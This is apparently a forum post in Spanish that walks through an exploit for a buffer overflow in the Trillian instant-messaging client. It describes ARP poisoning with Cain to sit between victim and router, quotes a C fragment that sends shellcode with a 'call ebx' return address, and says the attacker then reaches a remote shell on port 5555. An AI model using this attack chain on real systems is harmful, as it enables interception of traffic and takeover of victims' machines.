Hmmm... al final he tenido q pringarme con este exploit (me quería escaquear)

Bueno, voy a explicarlo a la manera q yo lo entiendo, q espero sea lo mismo q quiere decir Rojodos.
El atacante debe realizar la técnica de hombre en el medio entre el cliente Trillian y el servidor MSN. Situándonos en una red local, esto significaría q el atacante debe situarse entre la víctima y el router, no es asi?? Supongo q a fin de poder llevar esto a cabo, podemos utilizar el Cain (
http://foro.elhacker.net/index.php/topic,33575.0.html) para envenenar ambos equipos (victima y router) y hacer q su tráfico circule a través de nuestro equipo. Es entonces cuando ejecutamos el exploit, q se pondrá a la escucha en el equipo atacante, esperando a q el cliente Trillian de la víctima se conecte al servidor de MSN (a internet, esto es, al router). En cuanto el equipo atacante reciba el intento de conexión de la victima, se manda el exploit:
n=recv(client, mess, sizeof(mess),0);
if (n < 0){
printf("Error receving connections\r\n");
exit(-1);
}
printf("Received a connection request from a client.\r\n");
strcpy(mess, shellcode);
for(i=strlen(shellcode); i < 4090; i++)
mess[i]='x';
mess[i]=0x33; /**/
mess[i+1]=0x12; /*return address of a "call ebx" command in trillian.exe*/
mess[i+2]=0x40; /**/
mess[i+3]='\r';
mess[i+4]='\n';
mess[i+5]='\0';
n = send(client, mess, strlen(mess),0);
if (n > 0){
printf("Exploit sent succesfully.\r\n");
printf("Now connect to port 5555.\r\n");
}
Magia potagia, ya podemos conectarnos al puerto 5555 de la víctima para obtener una shell remota...
Bueno, es lo mismo q ha explicado Rojodos, pero un poco más mascado. Asi de paso, yo tb me he enterado de q iba la cosa. En cuanto tenga tiempo, a ver si hago mis experimentos...
Lastima q la vulnerabilidad sea en el cliente Trillian, os imagináis q fuera en el cliente Messenger... Uff... me da algo solo de pensarlo!!
Salu2